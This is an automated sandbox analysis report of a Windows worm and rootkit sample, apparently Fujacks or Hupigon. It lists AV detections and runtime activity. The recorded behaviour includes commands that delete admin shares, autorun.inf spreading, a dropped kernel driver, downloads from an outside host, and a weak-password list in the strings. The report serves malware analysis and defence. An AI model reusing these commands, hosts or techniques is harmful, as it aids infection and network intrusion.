Analysis Date: 2015-04-06 20:38:49
MD5: 0b07d815ca7ebaa9f9f82a1c92489e40
SHA1: 74e85ca8c4b44f0fcfac0183b431f9f2f4d15ed8

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .nsp0 md5: a41250b4f23aa95ace25fe3ee3761eb6 sha1: a12026ec59c031e8dca8148cb36a67c477230507 size: 356352
Section .nsp1 md5: 831d5b0b0be5df127eddcb9e48a64b4e sha1: 37725da02852528e37e904902ab8c7e59de98a45 size: 77824
Section .nsp2 md5: 510dbd15460ab5899b530fa6e252f773 sha1: 34d54bed32add78d8c42ca32a2100f5dfc6e2b9c size: 12800
Timestamp: 1992-06-19 22:22:17
Packer: Borland Delphi v6.0 - v7.0
PEhash: 719160e1ba17009dc2542a11cfcfa10783265940
IMPhash: 31e401b3ab62da1771413f32fd30dabd
AV 360 Safe: no_virus
AV Ad-Aware: Backdoor.Hupigon.AYGZ
AV Alwil (avast): Rootkit-gen [Rtk]:Imponex [Wrm]
AV Arcabit (arcavir): Backdoor.Hupigon.AYGZ:Rootkit.Agent.AIZZ
AV Authentium: W32/Rootkit.LIUE-0684
AV Avira (antivir): Rkit/Small.AN
AV BullGuard: Backdoor.Hupigon.AYGZ
AV CA (E-Trust Ino): Win32/Tnega.ORVAbRB
AV CAT (quickheal): no_virus
AV ClamAV: Win.Trojan.Rootkit-4869
AV Dr. Web: Win32.HLLP.Whboy.104
AV Emsisoft: Backdoor.Hupigon.AYGZ
AV Eset (nod32): Win32/Fujacks virus
AV Fortinet: W32/Fujacks.AW
AV Frisk (f-prot): W32/Rootkit.CKZ
AV F-Secure: Backdoor.Hupigon.AYGZ
AV Grisoft (avg): PSW.Generic8.BBX.dropper
AV Ikarus: Rootkit.Win32.Small
AV K7: Trojan ( 003bc76d1 )
AV Kaspersky 2015: Trojan.Win32.Generic:Worm.Win32.Generic:Worm.Win32.AutoRun.dvw
AV MalwareBytes: Packed.NSPack
AV Mcafee: W32/Fujacks.gen.a
AV Microsoft Security Essentials: Worm:Win32/Emerleox.gen!A
AV MicroWorld (escan): Backdoor.Hupigon.AYGZ
AV Rising: Win32.BMW.q
AV Sophos: W32/Fujacks-BJ
AV Symantec: Suspicious.DLoader
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): BScope.Rootkit.Gamepass.01309

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\WINDOWS\system32\drivers\TXPlatform.exe
Creates Process: C:\WINDOWS\system32\drivers\TXPlatform.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del97$$.bat

Process
↳ cmd.exe /c net share C$ /del /y

Creates Process: net share C$ /del /y

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del13$$.bat

Process
↳ cmd.exe /c net share admin$ /del /y

Creates Process: net share admin$ /del /y

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝ 3
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: _SHuassist.mtx
Creates Mutex: Shell.CMruPidlList

Process
↳ cmd.exe /c net share C$ /del /y

Creates Process: net share C$ /del /y

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del99$$.bat

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝ 3
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: _SHuassist.mtx
Creates Mutex: Shell.CMruPidlList

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{B45FF030-4447-11D2-85DE-00C04FA35C89}\iexplore\Type ➝ 1
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore\Type ➝ 4
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order ➝ NULL
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝ 3
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement ➝ NULL
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore\Type ➝ 4
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: _SHuassist.mtx
Creates Mutex: Shell.CMruPidlList
Winsock DNS: www.52cps.com

Process
↳ cmd.exe /c net share E$ /del /y

Creates Process: net share E$ /del /y

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del31$$.bat

Process
↳ cmd.exe /c net share admin$ /del /y

Creates Process: net share admin$ /del /y

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del10$$.bat

Process
↳ cmd.exe /c net share E$ /del /y

Creates Process: net share E$ /del /y

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{B45FF030-4447-11D2-85DE-00C04FA35C89}\iexplore\Type ➝ 1
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore\Type ➝ 4
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order ➝ NULL
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝ 3
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement ➝ NULL
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore\Type ➝ 4
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: _SHuassist.mtx
Creates Mutex: Shell.CMruPidlList
Winsock DNS: www.52cps.com

Process
↳ C:\WINDOWS\system32\drivers\TXPlatform.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Explorer ➝ C:\WINDOWS\system32\drivers\TXPlatform.exe\\x00
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CLASSES_ROOT\HTTP\shell\open\command\ ➝ "C:\Program Files\InternetExplorer\iexplore.exe" -nohome
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun ➝ 128
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue ➝ NULL
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\myUPdatetxt.txt
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Resource\CMap\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\Desktop_1.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\37$$.Ico
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\LanguageNames\Desktop_1.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\del31$$.bat
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Desktop_1.ini
Creates File: C:\temp\run\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Resource\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Help\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\Desktop_1.ini
Creates File: C:\autorun.inf
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\65$$.Ico
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\VDKHome\Desktop_1.ini
Creates File: C:\autorun.inf
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Resource\Font\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins3d\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Optional\Desktop_1.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Adobe Reader\7.0.0\en_US\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Annotations\Desktop_1.ini
Creates File: C:\RECYCLER\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\Desktop_1.ini
Creates File: C:\RECYCLER\Desktop_1.ini
Creates File: C:\Program Files\xerox\nwwia\Desktop_1.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\del97$$.bat
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\SPPlugins\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Messages\ENU\Desktop_1.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\del56$$.bat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Howto\images\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Annotations\Stamps\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Resource\Font\PFM\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\ENU\Images\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Multimedia\MPP\Desktop_1.ini
Creates File: C:\\\xa1\\xa1\\xa1\\xa1\\xa1\\xa1.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\OLS\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Browser\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Templates\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Adobe Reader\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\ImageViewer\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Desktop_1.ini
Creates File: C:\Program Files\xerox\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Howto\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\OLS\Locale\ENU\Desktop_1.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\del13$$.bat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\del10$$.bat
Creates File: PIPE\wkssvc
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\instmsiw.exe
Creates File: C:\Program Files\Adobe\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\AcroForm\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\OLS\Locale\Desktop_1.ini
Creates File: C:\Program Files\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\ImageViewer\en_US\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\acroaum.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\Providers\Proximity\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Multimedia\Desktop_1.ini
Creates File: C:\Program Files\Online Services\Desktop_1.ini
Creates File: C:\\\xa1\\xa1\\xa1\\xa1\\xa1\\xa1.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Messages\Desktop_1.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\99$$.Ico
Creates File: c:\QQ.sys
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\ENU\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Help\ENU\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\AcroForm\PMP\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Javascripts\Desktop_1.ini
Creates File: C:\Program Files\Uninstall Information\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\setup.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Esl\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\WebSearch\Desktop_1.ini
Creates File: C:\temp\logs\Desktop_1.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\del99$$.bat
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\Providers\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\VDKHome\ENU\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Adobe Reader\7.0.0\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Annotations\Stamps\ENU\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Desktop_1.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\87$$.Ico
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\Desktop_1.ini
Creates File: C:\temp\Desktop_1.ini
Creates File: C:\Program Files\MSN Gaming Zone\Desktop_1.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\26$$.Ico
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Desktop_1.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\41$$.Ico
Deletes File: c:\QQ.sys
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\87$$.Ico
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\65$$.Ico
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\99$$.Ico
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\26$$.Ico
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\37$$.Ico
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\41$$.Ico
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\del99$$.bat
Creates Process: cmd.exe /c net share E$ /del /y
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\del31$$.bat
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\del97$$.bat
Creates Process: cmd.exe /c net share admin$ /del /y
Creates Process: cmd.exe /c net share admin$ /del /y
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\del10$$.bat
Creates Process: cmd.exe /c net share E$ /del /y
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\html>\\n
Creates Process: cmd.exe /c net share C$ /del /y
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\del13$$.bat
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\del56$$.bat
Creates Process: cmd.exe /c net share C$ /del /y
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Service: RESSDT - c:\QQ.sys
Winsock URL: <html>\\n <head>\\n <title>404 Not Found</title>\\n </head>\\n <body>\\n <h1>Not Found</h1>\\n <p>Your browser sent a request that this server could not understand.</p>\\n <p>No such file or directory.</p>\\n <hr />\\n <address>Microsoft-IIS/7.0</address>\\n </body>\\n</html>\\n
Winsock URL: http://www.52CPS.COM/goto/down.txt

Process
↳ net share C$ /del /y

Creates Process: net1 share C$ /del /y

Process
↳ net share admin$ /del /y

Creates Process: net1 share admin$ /del /y

Process
↳ net share C$ /del /y

Process
↳ net share E$ /del /y

Creates Process: net1 share E$ /del /y

Process
↳ net share admin$ /del /y

Creates Process: net1 share admin$ /del /y

Process
↳ net share E$ /del /y

Creates Process: net1 share E$ /del /y

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 800

Process
↳ Pid 844

Process
↳ C:\WINDOWS\System32\svchost.exe

Creates File: C:\WINDOWS\system32\WBEM\Logs\wbemess.log

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝ 7
Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝ NULL
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝ C:\WINDOWS\System32\spool\PRINTERS\\x00

Process
↳ Pid 1860

Process
↳ Pid 1140

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\html>\\n

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del56$$.bat

Process
↳ net1 share C$ /del /y

Creates File: PIPE\srvsvc

Process
↳ net1 share admin$ /del /y

Creates File: PIPE\srvsvc

Process
↳ net1 share E$ /del /y

Process
↳ net1 share admin$ /del /y

Creates File: PIPE\srvsvc

Process
↳ net1 share E$ /del /y

Creates File: PIPE\srvsvc

Network Details:

DNS: www.52cps.com
Type: A
141.8.225.80
HTTP GET: http://www.52CPS.COM/goto/down.txt
User-Agent: ErrCode
HTTP GET: http://www.52cps.com/TJ.Htm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://www.52CPS.COM/goto/down.txt
User-Agent: ErrCode
HTTP GET: http://www.52cps.com/TJ.Htm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1041 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1042 ➝ 10.1.2.1:139
Flows TCP: 192.168.1.1:1043 ➝ 10.1.2.1:445
Flows TCP: 192.168.1.1:1045 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1046 ➝ 10.1.2.1:445
Flows TCP: 192.168.1.1:1047 ➝ 10.1.2.1:445
Flows TCP: 192.168.1.1:1048 ➝ 10.1.2.1:445
Flows TCP: 192.168.1.1:1049 ➝ 10.1.2.1:445
Flows TCP: 192.168.1.1:1050 ➝ 10.1.2.1:445
Flows TCP: 192.168.1.1:1051 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1062 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1063 ➝ 10.1.2.1:445
Flows TCP: 192.168.1.1:1064 ➝ 10.1.2.1:445
Flows TCP: 192.168.1.1:1065 ➝ 10.1.2.1:445
Flows TCP: 192.168.1.1:1066 ➝ 10.1.2.1:445

Raw Pcap

Strings
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
A call to an OS function failed
Access violation
Application Error1Format '%s' invalid or incompatible with argument
April
Assertion failed
August	September
Bitmap image is not valid
Cannot assign a %s to a %s%List does not allow duplicates ($0%x)%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Canvas does not allow drawing Clipboard does not support Icons
Control-C hit
December
Division by zero
DVCLAL
$Error creating variant or safe array)Variant or safe array index out of bounds
Exception in safecall method
External exception %x
February
File access denied
File not found
Floating point division by zero
Floating point overflow
Floating point underflow
Friday
Icon image is not valid!Cannot change the size of an icon
Integer overflow Invalid floating point operation
Interface not supported
Invalid argument
Invalid argument to date encode
Invalid argument to time encode
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid filename
Invalid numeric input
Invalid pointer operation
Invalid property value List capacity out of bounds (%d)
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant type
Invalid variant type conversion
I/O error %d
January
jjjj
July
June
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
MAINICON
March
Monday
No argument for format '%s'"Variant method calls not supported
November
October
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Operation not supported
Out of memory
Out of system resources
PACKAGEINFO
Privileged instruction(Exception %s in module %s at %p.
Range check error
Read
Read beyond end of file	Disk full
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Saturday
%s%s
%s.Seek not implemented$Operation not allowed on sorted list
%s (%s, line %d)
Stack overflow
Stream read error
Stream write error
Sunday
System Error.  Code: %d.
Thursday
Too many open files
Tuesday	Wednesday
Unexpected variant error
Variant or safe array is locked
Variant overflow
Write
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
000000
0123456789ABCDEF
111111
11111111
121212
123123
123456
1234567
12345678
123456789
1234qwer
123abc
123asd
123qwe
1Kill_Unit
1PE_Infect
3Messages
5201314
654321
88888888
901100
abc123
admin$
admin123
administrator
Administrator
advapi32.dll
ADVAPI32.DLL
ANSI_CHARSET
AnsiString To UnicodeString Error!
Apartment
ARABIC_CHARSET
Array 
[AutoRun]
:\autorun.inf
BALTIC_CHARSET
baseball
$$.bat
BOFWLF
Boolean
ByRef 
CaptureNet
ccEvtMgr
ccProxy
ccSetMgr
ChangeServiceConfig2A
ChangeServiceConfig2W
CharNextA
CharToOemA
CharUpperBuffA
CHINESEBIG5_CHARSET
cl3DDkShadow
cl3DLight
clActiveBorder
clActiveCaption
clAppWorkSpace
clAqua
Classes
^Classes
clBackground
clBlack
clBlue
clBtnFace
clBtnHighlight
clBtnShadow
clBtnText
clCaptionText
clCream
clDefault
clFuchsia
clGradientActiveCaption
clGradientInactiveCaption
clGray
clGrayText
clGreen
clHighlight
clHighlightText
clHotLight
clInactiveBorder
clInactiveCaption
clInactiveCaptionText
clInfoBk
clInfoText
clLime
clMaroon
clMedGray
clMenu
clMenuBar
clMenuHighlight
clMenuText
clMoneyGreen
clNavy
clNone
clOlive
CloseHandle
CloseServiceHandle
closesocket
clPurple
clScrollBar
CLSIDFromProgID
clSilver
clSkyBlue
clTeal
clWhite
clWindow
clWindowFrame
clWindowText
clYellow
cmd.exe /c net share 
cmd.exe /c net share admin$ /del /y
c:\MyRARwork
CoAddRefServerProcess
CoCreateInstance
CoCreateInstanceEx
CoInitialize
CoInitializeEx
Common Files
ComnView
CompareStringA
ComPlus Applications
computer
connect
Consts
ControlService
Cool_GameSetup.exe
CopyFileA
CoReleaseServerProcess
CoResumeClassObjects
CoSuspendClassObjects
CoUninitialize
"C:\Program Files\InternetExplorer\iexplore.exe" -nohome
C:\Program Files\WinRAR\myrar.txt
C:\Program Files\WinRAR\winrar.exe
"C:\Program Files\WinRAR\winrar.exe" u -as -ep1 -inul -ibck "
"C:\Program Files\WinRAR\winrar.exe" x -inul -ibck -p- "
c:\QQ.sys
CreateBitmap
CreateBrushIndirect
CreateCompatibleBitmap
CreateCompatibleDC
CreateDIBitmap
CreateDirectoryA
CreateEventA
CreateFileA
CreateFontIndirectA
CreateIcon
CreatePalette
CreatePenIndirect
CreateServiceA
CreateThread
CreateToolhelp32Snapshot
Currency
CVariants
database
DbgPrint
Decimal
Default
DEFAULT_CHARSET
del %0
DeleteCriticalSection
DeleteDC
DeleteFileA
DeleteObject
DeleteService
$ /del /y
Desktop_1.ini
DestroyIcon
Dispatch
DispatchMessageA
Documents and Settings
\Documents and Settings\All Users\
\Documents and Settings\All Users\Start Menu\Programs\Startup\
DosDateTimeToFileTime
Double
DrawIconEx
drivers\
Dsniff
dwPointerRva: %.8X = dwKSDT!
EAbstractError
EAccessViolation
EAssertionFailed
EASTEUROPE_CHARSET
	EControlC
EConvertError
EDivByZero
	EExternal
EExternalException
EFCreateError
EFilerError
EFileStreamError
EFOpenError@DA
EHeapException
EInOutError
EIntError
EIntfCastError
EIntOverflow
EInvalidCast
EInvalidGraphic(
EInvalidGraphicOperation
EInvalidOp
EInvalidOperation
EInvalidPointer
EListError
EMathError
enable
EnterCriticalSection
EnumCalendarInfoA
EnumWindows
EOleError
EOleException
EOleSysError
EOSError
EOutOfMemory
EOutOfResources\FA
EOverflow
EPrivilege
ERangeError|
EReadError
ErrCode
ESafecallException
EStackOverflow
EStreamError
EStringListError
EUnderflow
EVariantArrayCreateError
EVariantArrayLockedError
EVariantBadIndexError
EVariantBadVarTypeError\
EVariantDispatchError
EVariantError
EVariantInvalidArgError
EVariantInvalidOpError
EVariantNotImplError
EVariantOutOfMemoryError
EVariantOverflowError
EVariantTypeCastError
EVariantUnexpectedError
EWriteErrorHEA
ExAllocatePool
ExAllocatePoolWithTag
Exception
ExFreePool
ExFreePoolWithTag
ExitProcess
Explorer
ExtractIconA
EZeroDivide
FComObj
File Read Error!
FileTimeToDosDateTime
FileTimeToLocalFileTime
FileTimeToSystemTime
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
Find Ssdt Base Error!!!
FindWindowA
FireSvc
FormatMessageA
FPUMaskValue
FreeLibrary
FreeResource
fuckyou
FunUnit
ganran
GB2312_CHARSET
gdi32.dll
GDI32.DLL
GetACP
GetBitmapBits
GetCommandLineA
GetCPInfo
GetCurrentPositionEx
GetCurrentThreadId
GetDateFormatA
GetDeviceCaps
GetDIBits
GetDiskFreeSpaceA
